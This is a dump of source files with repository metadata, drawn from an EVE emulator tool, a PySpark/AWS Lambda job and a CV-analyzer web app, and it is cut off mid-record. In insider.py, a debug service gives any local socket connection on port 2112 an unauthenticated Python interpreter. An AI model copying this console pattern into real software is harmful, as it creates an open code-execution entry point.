"num_lines": 28,
"path": "/CMakeLists.txt",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.16)\nproject(evegen)\n\nset(CMAKE_CXX_STANDARD 14)\n\ninclude(\"cmake/FindMariaDBClient.cmake\")\n\ninclude_directories(src)\n\nfind_package(Python 2.7 COMPONENTS Development REQUIRED)\n\nadd_executable(evegen\n src/db.cpp\n src/db.h\n src/devtools.cpp\n src/devtools.h\n src/main.cpp\n src/patch.cpp\n src/patch.h\n src/stb_c_lexer.h)\n\ntarget_include_directories(evegen PRIVATE ${Python_INCLUDE_DIRS} ${MariaDBClient_INCLUDE_DIR})\ntarget_link_libraries(evegen ${Python_LIBRARIES} ${MariaDBClient_LIBRARIES})\n\nif (EXISTS \"${Python_INCLUDE_DIRS}/Stackless\")\n message(STATUS \"Stackless Python installation detected, making include corrections\")\n target_include_directories(evegen PRIVATE \"${Python_INCLUDE_DIRS}/Stackless\")\nendif()\n"
},
{
"alpha_fraction": 0.5186255574226379,
"alphanum_fraction": 0.5285806059837341,
"avg_line_length": 26.307018280029297,
"blob_id": "f9b12b2b13d083965c7f267ef5942c028a1f3b05",
"content_id": "0d60a609476475c009511a8d3b4375f120cbc5df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3114,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 114,
"path": "/insider.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import service\nimport marshal\nimport types\nimport log\nimport socket\nimport stackless\nimport code\nimport sys\n\n# Thanks to t0st for the console code \\0/\n# TODO: Nick Pull remote console into it's own service.\n\nclass insider(service.Service):\n __guid__ = 'svc.insider'\n __displayname__ = 'Evemu Insider Service'\n __notifyevents__ = ['OnSessionChanged']\n\n # socket wrapper\n class probe_sw():\n def __init__(self, s):\n self.s = s\n def read(self, len):\n return self.s.recv(len)\n def write(self, str):\n return self.s.send(str)\n def readline(self):\n return self.read(256) # lazy implementation for quick testing\n \n def __init__(self):\n service.Service.__init__(self)\n \n def OnSessionChanged(self, isRemote, sess, change):\n self.LogInfo('On Session Change In Insider')\n \n def Show(self, argOne, argTwo):\n self.LogInfo('Insider Show Was Called')\n import form\n form.DevWindow.Open()\n sm.GetService(\"registry\").GetWindow(\"devwindow\").Minimize()\n\n def start_remote_console(self):\n import socket\n import stackless\n self.LogInfo(\"Starting remote console on port 2112\")\n # listening socket\n self.s = socket.socket()\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.s.bind(('127.0.0.1', 2112))\n self.s.listen(3)\n \n # k, go!\n #stackless.tasklet(probe_accept)(probe_sock)\n #stackless.run()\n \n #self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n stackless.tasklet(self.probe_accept)()\n\n def probe_accept(self):\n import socket\n import stackless\n import code\n import sys\n while True:\n c, a = self.s.accept()\n c = self.probe_sw(c)\n \n sys.stdin = c\n sys.stdout = c\n sys.stderr = c\n \n # should break if connection is dropped\n try:\n code.interact()\n except:\n pass\n \n # I wanted to kill the socket on clean exit()\n # but it doesn't seem to work?\n try:\n c.s.shutdown(SHUT_RDWR)\n c.s.close()\n except:\n pass\n \n # restore original stds\n sys.stdin = sys.__stdin__\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n \n stackless.schedule()\n\n def probe_connect(self):\n import socket\n import stackless\n import code\n import sys\n\n self.s.connect((\"127.0.0.1\", 2112))\n c = self.probe_sw(self.s)\n\n sys.stdin = c\n sys.stdout = c\n sys.stderr = c\n # should break if connection is dropped\n try:\n code.interact()\n except:\n pass\n # restore original stds\n sys.stdin = sys.__stdin__\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n stackless.schedule()\n\n"
}
] | 21 |
vijaynathari/remoteclazz-emr
|
https://github.com/vijaynathari/remoteclazz-emr
|
1ae2a5fc856e68e5088a9d2d6144629f412ebf75
|
faa90c93d2378da177a11a43d6072725f69f5880
|
b770a99525019fbc269188c687efc81027d14fdd
|
refs/heads/main
| 2023-08-14T23:09:16.101889 | 2021-09-27T06:01:46 | 2021-09-27T06:01:46 | 410,755,727 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6880828738212585,
"alphanum_fraction": 0.6943005323410034,
"avg_line_length": 37.63999938964844,
"blob_id": "28fa2753f01b4af12c21d0af7cb151a50d92a855",
"content_id": "bcde108c92723f9e5b96dc36f7d34e4d579e784c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 965,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/script/pyspark_violations.py",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "import sys\nfrom operator import add\nfrom pyspark.sql import SparkSession\n\nif __name__ == \"__main__\":\n # Create Spark session\n spark = SparkSession.builder.appName(\"Calculate Red Health Violations\").getOrCreate()\n\n # Load the restaurant violation CSV data\n restaurants_df = spark.read.option(\"header\", \"true\").csv(sys.argv[1])\n\n # Create an in-memory DataFrame to query\n restaurants_df.createOrReplaceTempView(\"restaurant_violations\")\n\n # Create a DataFrame of the top 10 restaurants with the most Red violations\n top_red_violation_restaurants = spark.sql(\"SELECT name, count(*) AS total_red_violations \" +\n \"FROM restaurant_violations \" +\n \"WHERE violation_type = 'RED' \" +\n \"GROUP BY name \" +\n \"ORDER BY total_red_violations DESC LIMIT 10 \")\n\n # Write the results to the specified output URI\n top_red_violation_restaurants.write.option(\"header\", \"true\").mode(\"overwrite\").csv(sys.argv[2])\n\n spark.stop()"
},
{
"alpha_fraction": 0.6202090382575989,
"alphanum_fraction": 0.6376306414604187,
"avg_line_length": 21.153846740722656,
"blob_id": "b25cd812442a8d92514978c7ca19fa9718df36c6",
"content_id": "7893aa30ae47848b18f6b7b92a5c898b505c3779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/Lambda/LambdaCode.py",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "import json\nimport boto3\n\ndef lambda_handler(event, context):\n glue=boto3.client('glue')\n \n # give your crwler name here\n glue.start_crawler(Name='remoteclazz-emr-crawler')\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Successfully Executed')\n }"
},
{
"alpha_fraction": 0.8304498195648193,
"alphanum_fraction": 0.8304498195648193,
"avg_line_length": 25.272727966308594,
"blob_id": "d0d047e1acd5b7629ed74717cd6cbce921228b30",
"content_id": "9e4c791dd140eaa8201cb590d434954000e5ce56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 11,
"path": "/README.md",
"repo_name": "vijaynathari/remoteclazz-emr",
"src_encoding": "UTF-8",
"text": "# remoteclazz-emr\n\nSpark Script File: script/pyspark_violations.py\n\nInput Data File: input/food_establishment_data.csv\n\nStep Function Definition: Step Function/StepFunctionDefinition.json\n\nStep Function Input: Step Function/StepFunctionInput.json\n\nLambda Script File: Lambda/LambdaCode.py\n"
}
] | 3 |
RoisinNiF/cfggroupproject
|
https://github.com/RoisinNiF/cfggroupproject
|
ccf105dbdad005d7b7bef76ee6c5bd3486825908
|
5ff3c06c0bf5eb8598c8d99a5c1e9593f976ed40
|
b05c867dc6639f8d23562570ab2ef3a17a3251d1
|
refs/heads/master
| 2023-04-09T11:54:22.233064 | 2021-04-15T13:39:35 | 2021-04-15T13:39:35 | 356,021,162 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5748193860054016,
"alphanum_fraction": 0.5804953575134277,
"avg_line_length": 30.225807189941406,
"blob_id": "b0d7d8dcab827bd7f56bbc75e75c6b39bb412d0a",
"content_id": "e1009307d0033455f8ec444549c36688c0661dec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1950,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 62,
"path": "/main.py",
"repo_name": "RoisinNiF/cfggroupproject",
"src_encoding": "UTF-8",
"text": "import csv\n\ndef read_data():\n data = []\n with open('sales.csv', 'r') as sales_csv:\n spreadsheet = csv.DictReader(sales_csv)\n for row in spreadsheet:\n data.append(row)\n return data\ndef run():\n data = read_data()\n sales = []\n for row in data:\n sale = int(row['sales'])\n sales.append(sale)\n total = sum(sales)\n highest_sale = max(sales)\n lowest_sale = min(sales)\n month = []\n for row in data:\n months = str(row['month'])\n month.append(months)\n expenditure = []\n for row in data:\n expense = int(row['expenditure'])\n expenditure.append(expense)\n \n #For loop prints the total sales across each month\n print('Months Sales')\n for months, sale in zip(month, sales): \n print(months,sale)\n \n print('Total sales: €{}'.format(total))\n print('Average sales: €{}'.format((round(total/12, 2))))\n \n #For loops to find the highest and lowest sale months\n for months, sale in zip(month, sales):\n if sale == max(sales):\n print('Highest sale month: {}'.format(months))\n print('Highest sale: €{}'.format(highest_sale))\n for months, sale in zip(month, sales): \n if sale == min(sales):\n print('Lowest sale month: {}'.format(months))\n print('Lowest sale: €{}'.format(lowest_sale))\n \n # Monthly Profit\n yearly_profit = 0\n print('Monthly Profit in €')\n for sale, expense in zip(sales, expenditure):\n monthly_profit = sale - expense\n print(monthly_profit)\n yearly_profit = yearly_profit + monthly_profit\n print('Yearly profit: €{}'.format(yearly_profit))\n \n #Monthly Sale Changes as percentages\n print('Monthly Sale Changes as Percentages (%)')\n i = 0\n for sale in sales:\n percentage_diff=((sales[i+1] - sales[i])/sales[i]) * 100\n print(round(percentage_diff, 2))\n i = i + 1\nrun()\n\n\n"
}
] | 1 |
yjlo123/CViA
|
https://github.com/yjlo123/CViA
|
64a933b1e5773be9c6aa44dafbb429e6a06e82a7
|
8a2b87d5060866df5f399559b960946e9cfb16cc
|
1e9e1a96437f78419bef16f3ad474011e92b2aa6
|
refs/heads/master
| 2020-04-09T17:04:29.756180 | 2015-11-09T19:09:50 | 2015-11-09T19:09:50 | 42,941,260 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4375,
"alphanum_fraction": 0.7124999761581421,
"avg_line_length": 15.199999809265137,
"blob_id": "d03bdab59ae9ba6c62ce189ecb5cb0ceec91d0b8",
"content_id": "0ab95909340035b3e26da97506ffb990d271e690",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "Flask==0.10.1\npython-docx==0.8.5\nlxml==3.4.4\npdfminer==20140328\ntextblob==0.11.0"
},
{
"alpha_fraction": 0.665444552898407,
"alphanum_fraction": 0.6672777533531189,
"avg_line_length": 32.09090805053711,
"blob_id": "d8f3237d47c3bdcf4f44cc49b35194e22dd4cac7",
"content_id": "193557dd0378c0c5fd24a75ddcb92262cad10a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1091,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 33,
"path": "/cvConverter/PDFFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom cStringIO import StringIO\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\n\n__author__ = 'siwei'\n\nclass PDFFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"pdf\"\n\n def convert(self):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n codec = 'utf-8'\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n fp = file(self.path, 'rb')\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n password = \"\"\n maxpages = 0\n caching = True\n pagenos=set()\n for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):\n interpreter.process_page(page)\n fp.close()\n device.close()\n str = retstr.getvalue()\n retstr.close()\n return self.text+str"
},
{
"alpha_fraction": 0.6138842701911926,
"alphanum_fraction": 0.6142148971557617,
"avg_line_length": 28.096153259277344,
"blob_id": "68385e1d59237855a734b5c510305e1fd6bdc713",
"content_id": "a6fa89ef9c545d12c9e8a237a927ee8c9f3baf29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3025,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 104,
"path": "/Controller.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter import Converter\nfrom cvEvaluator.EduEvaluator import EduEvaluator\nfrom cvEvaluator.ExpEvaluator import ExpEvaluator\nfrom cvEvaluator.LangEvaluator import LangEvaluator\nfrom cvEvaluator.OtherEvaluator import OtherEvaluator\nfrom cvEvaluator.SkillEvaluator import SkillEvaluator\nfrom cvParser.Parser import Parser\nfrom cvEvaluator import Evaluator\nimport pprint\nfrom cvScorer.Scorer import Scorer\n\n__author__ = 'siwei'\n\nclass Controller():\n def __init__(self):\n self.evaluator = Evaluator.Evaluator()\n self.parser = Parser()\n self.converter = Converter.DocConverter()\n self.scorer = Scorer()\n self.cv_list = []\n self.cv_scores = []\n self.setup_evaluators()\n self.job_function = \"\"\n\n def setup_evaluators(self):\n language_evaluator = LangEvaluator()\n skill_evaluator = SkillEvaluator()\n education_evaluator = EduEvaluator()\n experience_evaluator = ExpEvaluator()\n other_evaluator = OtherEvaluator()\n self.evaluator.add(language_evaluator)\n self.evaluator.add(skill_evaluator)\n self.evaluator.add(education_evaluator)\n self.evaluator.add(experience_evaluator)\n self.evaluator.add(other_evaluator)\n\n def clear(self):\n self.cv_list = []\n self.cv_scores = []\n\n def setup_requirement(self, requirement):\n self.evaluator.set_requirement(requirement)\n\n def set_weight(self, weight):\n self.scorer.set_weight(weight)\n\n def set_job_function(self, job_function):\n \"\"\n\n def evaluate(self, cvs):\n self.clear()\n for cv in cvs:\n CV_Text = self.converter.documentToText(cv).decode('unicode_escape').encode('ascii','ignore')\n cvobj = self.parser.convertToObj(CV_Text)\n #pp.pprint(cvobj)\n self.cv_list.append(cvobj)\n\n self.evaluator.set_cv(cvobj)\n self.cv_scores.append(self.evaluator.evaluate())\n\n #x.print_rank()\n\n def get_scores(self):\n return self.scorer.cal_all_score(self.cv_scores)\n\n def get_cv_list(self):\n return self.cv_list\n\n def get_cv_score(self):\n return self.cv_scores\n\n\nif __name__ == \"__main__\":\n requirement = {\n 'education':['bachelor'],\n 'skill': {\n 'must': ['windows','vpn','Web Development'],\n 'good': ['xp','iOS']\n },\n 'language':{\n 'must': ['English'],\n 'good': ['Chinese']\n },\n 'experience':{\n 'must': ['engineer'],\n 'good': []\n },\n 'other':['Google','reading']\n }\n\n cvs = [\n \"cv/LinkedIn/YaminiBhaskar.pdf\",\n \"cv/LinkedIn/DonnabelleEmbodo.pdf\",\n \"cv/LinkedIn/PraveenDeorani.pdf\",\n \"cv/LinkedIn/RussellOng.pdf\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\"]\n\n pp = pprint.PrettyPrinter(indent=4)\n\n ctrl = Controller()\n ctrl.setup_evaluators()\n ctrl.setup_requirement(requirement)\n ctrl.evaluate(cvs)\n pp.pprint(ctrl.get_scores())"
},
{
"alpha_fraction": 0.6367521286010742,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 26.58823585510254,
"blob_id": "512db44d9c232b7549480926e49b69416c2d0fa4",
"content_id": "2b5fd29ab52bca6077da6bee900349a433637757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 17,
"path": "/cvConverter/DOCXFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nimport docx\n\n__author__ = 'siwei'\n\nclass DOCXFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"docx\"\n\n def convert(self):\n document = docx.Document(self.path)\n #return document.paragraphs[0].text\n docText = '\\n'.join([\n paragraph.text.encode('utf-8') for paragraph in document.paragraphs if paragraph.text != \"\"\n ])\n return self.text+docText"
},
{
"alpha_fraction": 0.7005347609519958,
"alphanum_fraction": 0.7433155179023743,
"avg_line_length": 25.714284896850586,
"blob_id": "42dbb563a99a1c887e8d64be84f6fb87f33c9a7d",
"content_id": "a264435e365ae2064d9f14cd9f52db895e05ccfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 187,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 7,
"path": "/README.md",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "# CViA\nCurriculum Vitae Analyzer\n\n# Setup\n- Install Python packages: `pip install -r requirements.txt`\n- Start the server: `python main.py`\n- Open [localhost:8888](http://localhost:8888)\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 23,
"blob_id": "0f082469178c40843176800708f923dce7f93237",
"content_id": "44550c021d928027900f5ad27d88cbeddf4669f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/CVFields/__init__.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n"
},
{
"alpha_fraction": 0.5077071189880371,
"alphanum_fraction": 0.5154142379760742,
"avg_line_length": 29.558822631835938,
"blob_id": "e14362724dae62197b55dd1e7b4015f442efde7b",
"content_id": "8b803fba02dfecd9bd1c767029f5318aa5f0cfe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 34,
"path": "/cvEvaluator/EduEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass EduEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"education\"\n\n def evaluate(self, req, cv):\n req_edu = req[self.name]\n cv_edu = cv[self.name]\n edu_score = 0\n if req_edu == [] or cv_edu == []:\n return edu_score\n # print \"req \"+req[0]+\" has\"+str(cv)\n uni_list = []\n with open('university.txt') as f:\n content = f.readlines()\n for n in range(0, len(content)):\n uni = content[n][:-1].lower()\n uni_list.append(uni)\n # print uni_list\n\n for eduItem in cv_edu:\n # check degree requirement\n if req_edu[0] in eduItem['degree'].lower():\n edu_score += 20\n # check university ranking\n if eduItem['university'].lower() in uni_list:\n edu_score += 5\n #self.score = edu_score\n return edu_score"
},
{
"alpha_fraction": 0.5791962146759033,
"alphanum_fraction": 0.5823482871055603,
"avg_line_length": 22.518518447875977,
"blob_id": "72838bcea5f731a3e4136ce200e3165dc546f77a",
"content_id": "1a78ff7b96e1345c831439a143163973439f0cbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 54,
"path": "/Service.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from Controller import Controller\nfrom train_classifier import train\nimport pprint\n__author__ = 'siwei'\n\ncontroller = Controller()\ncontroller.setup_evaluators()\n\ndef input_requirement(requirement):\n controller.setup_requirement(requirement)\n\ndef input_weight(weight):\n controller.set_weight(weight)\n\ndef input_job_function(job_function):\n \"123\"\n\ndef evaluate_cvs(cvs):\n print \"evaluating CVs...\"\n controller.evaluate(cvs)\n return controller.get_scores()\n\ndef tran_classifier():\n train()\n\n\nif __name__ == \"__main__\":\n requirement = {\n 'education':['bachelor'],\n 'skill': {\n 'must': ['windows','vpn','Web Development'],\n 'good': ['xp','iOS']\n },\n 'language':{\n 'must': ['English'],\n 'good': ['Chinese']\n },\n 'experience':{\n 'must': ['r'],\n 'good': []\n },\n 'other':['reading']\n }\n\n cvs = [\"cv/simple.doc\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\",\n \"cv/LinkedIn/DonnabelleEmbodo.pdf\",\n \"cv/LinkedIn/PraveenDeorani.pdf\",\n \"cv/LinkedIn/RussellOng.pdf\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\"]\n\n input_requirement(requirement)\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(evaluate_cvs(cvs))"
},
{
"alpha_fraction": 0.663755476474762,
"alphanum_fraction": 0.663755476474762,
"avg_line_length": 22,
"blob_id": "3c63d4012bb4d9a76e83dbd07df52b725341dd34",
"content_id": "96ccd1919502963459293084d87fcd20243dde8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/CVFields/EducationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass EducationField(Field):\n\n def __init__(self,university,degree,major):\n self.university = university\n self.degree = degree\n self.major = major"
},
{
"alpha_fraction": 0.6797385811805725,
"alphanum_fraction": 0.6797385811805725,
"avg_line_length": 18.25,
"blob_id": "4d388ceec3f5c66f8307a9ac241064831e2802ef",
"content_id": "eed6297a422c2c0be214c9495210436f0a15533d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/CVFields/LanguageField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass LanguageField(Field):\n\n def __init__(self,textlist):\n self.language = textlist"
},
{
"alpha_fraction": 0.5259740352630615,
"alphanum_fraction": 0.5292207598686218,
"avg_line_length": 18.25,
"blob_id": "5c6be0dd31f04629687d4ca44f0f5ae825ac4968",
"content_id": "a9e1fe50744a134d3b6b9adab859027a8e38eea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 16,
"path": "/cvEvaluator/BaseEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass BaseEvaluator:\n\n def __init__(self):\n self.score = 0\n self.name = \"\"\n\n def get_name(self):\n return self.name\n\n def get_score(self):\n return self.score\n\n def to_string(self):\n return \"[\"+self.get_name()+\": \"+str(self.get_score())+\"]\"\n"
},
{
"alpha_fraction": 0.511864423751831,
"alphanum_fraction": 0.5279660820960999,
"avg_line_length": 41.14285659790039,
"blob_id": "f8296269eba6a67972069b1da54cb277d6b132f0",
"content_id": "641f7aa42646afe281d3809472ded1d7f0c7e297",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2360,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 56,
"path": "/cvParser/VolunteerExpParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "\nimport re\nimport FieldFactory\n\n__author__ = 'haojiang'\n\n\nclass VolunteerExpParser:\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseVolunteerExp(self,ExpStr):\n VolunteerExpList = ExpStr.splitlines()\n dateArr = []\n result = []\n for i in range(0,len(VolunteerExpList)):\n if self.MatchExpDate(VolunteerExpList[i]):\n dateArr.append(i)\n for i in range(0,len(dateArr)):\n index = dateArr[i]\n if i != len(dateArr)-1:\n title = VolunteerExpList[index-1]\n period = VolunteerExpList[index].split(\"(\")[1][:len(VolunteerExpList[index].split(\"(\")[1])-1]\n description = \"\"\n\n ### Not EMPTY description ###\n if index+3 != dateArr[i+1]:\n temp = index+2\n end = dateArr[i+1]-1\n while(temp!=end):\n description = description + VolunteerExpList[temp]\n temp+=1\n\n else:\n title = VolunteerExpList[index-1]\n period = VolunteerExpList[index].split(\"(\")[1][:len(VolunteerExpList[index].split(\"(\")[1])-1]\n description =\"\"\n\n ### Not EMPTY description\n if index+1 != len(VolunteerExpList):\n temp=index+2\n end = len(VolunteerExpList)\n while(temp!=end):\n description = description + VolunteerExpList[temp]\n temp+=1\n result.append(self.factory.produce(\"volunteerexp\",title,period,description))\n return result\n\n def MatchExpDate(self,text): # <--- Check whether the string is a date string\n if len(text.split(\"(\"))>1 and len(text)<50 and \"-\" in text:\n # From \" May 2013 - May 2015 (2 years)\" extract date.\n first = text.split(\"(\")[0].split(\"-\")[0]\n second = text.split(\"(\")[0].split(\"-\")[1]\n return re.findall(r'(?:january|february|march|april|may|june|july|august|september|october|november|december)\\s\\d{4}', first) !=[] and \\\n (re.findall(r'(?:january|february|march|april|may|june|july|august|september|october|november|december)\\s\\d{4}', second) !=[] or second ==\" present \")\n else:\n return False"
},
{
"alpha_fraction": 0.550000011920929,
"alphanum_fraction": 0.5541666746139526,
"avg_line_length": 25.66666603088379,
"blob_id": "1916b7c4ba10c506025a9b69bea05d01d461f920",
"content_id": "d969550608342860be400fd7ffb1a472b80fcff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/cvParser/PublicationsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\n\nclass PublicationsParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParsePublications(self,text): pass\n # textList = text.splitlines()\n # keyIndex = []\n # result = []\n # for i in range(0,len(textList)):\n # if \"Authors:\" in textList[i]:\n # keyIndex.append(i)\n # for i in range(0,len(keyIndex)):\n # theIndex = keyIndex[i]\n"
},
{
"alpha_fraction": 0.7472527623176575,
"alphanum_fraction": 0.7472527623176575,
"avg_line_length": 12.142857551574707,
"blob_id": "74dfd007e4ac2873ff773cff548e04facdba86be",
"content_id": "b141af0709d354fb56680082c6fd2598b2c53e4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/CVFields/SummaryField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\n\nfrom CVFields.Field import Field\n\nclass SummaryField(Field):pass"
},
{
"alpha_fraction": 0.6654411554336548,
"alphanum_fraction": 0.6654411554336548,
"avg_line_length": 23.81818199157715,
"blob_id": "ffe20461dddddb175fe6d0d081ee0d01ccc85e87",
"content_id": "d481f015d2858b72bb0e3a4f9f7e4c3635189f20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/CVFields/ExperienceField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass ExperienceField(Field):\n\n def __init__(self,title,period,description,company):\n self.title = title\n self.period = period\n self.description = description\n self.company = company"
},
{
"alpha_fraction": 0.5432098507881165,
"alphanum_fraction": 0.5444444417953491,
"avg_line_length": 20.891891479492188,
"blob_id": "1482d573b6bc6274edde301aaca7d26eb542465c",
"content_id": "69697dd4d6b9894d7032d351ef65f689046590e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 810,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 37,
"path": "/cvEvaluator/Evaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import pprint\n\n__author__ = 'siwei'\n\n\nclass Evaluator:\n\n def __init__(self):\n self.cv = {}\n self.requirement = {}\n self.scored_cv = {}\n self.evaluators = []\n\n def set_cv(self, cv):\n self.cv = cv\n\n def set_requirement(self, req):\n self.requirement = req\n\n def add(self, eva):\n self.evaluators.append(eva)\n\n def evaluate(self):\n this_score = {}\n for eva in self.evaluators:\n eva_name = eva.get_name()\n this_score[eva_name] = eva.evaluate(self.requirement, self.cv)\n self.scored_cv = {'cv': self.cv['path'], 'score': this_score}\n return self.scored_cv\n\n def print_rank(self):\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(self.scored_cv)\n\n\nif __name__ == \"__main__\":\n print \"\"\n"
},
{
"alpha_fraction": 0.6774193644523621,
"alphanum_fraction": 0.6774193644523621,
"avg_line_length": 19.75,
"blob_id": "6e31956b83a5fef68c8d2ab867f6b2de69e84298",
"content_id": "e8337c2aa3adec2f916bc8163edfaa8af7ce4841",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/cvConverter/TXTFileConveryer.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nimport docx\n\n__author__ = 'siwei'\n\nclass TXTFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"txt\"\n\n def convert(self):\n return self.text+open(self.path).read()"
},
{
"alpha_fraction": 0.5332606434822083,
"alphanum_fraction": 0.5419847369194031,
"avg_line_length": 28.612903594970703,
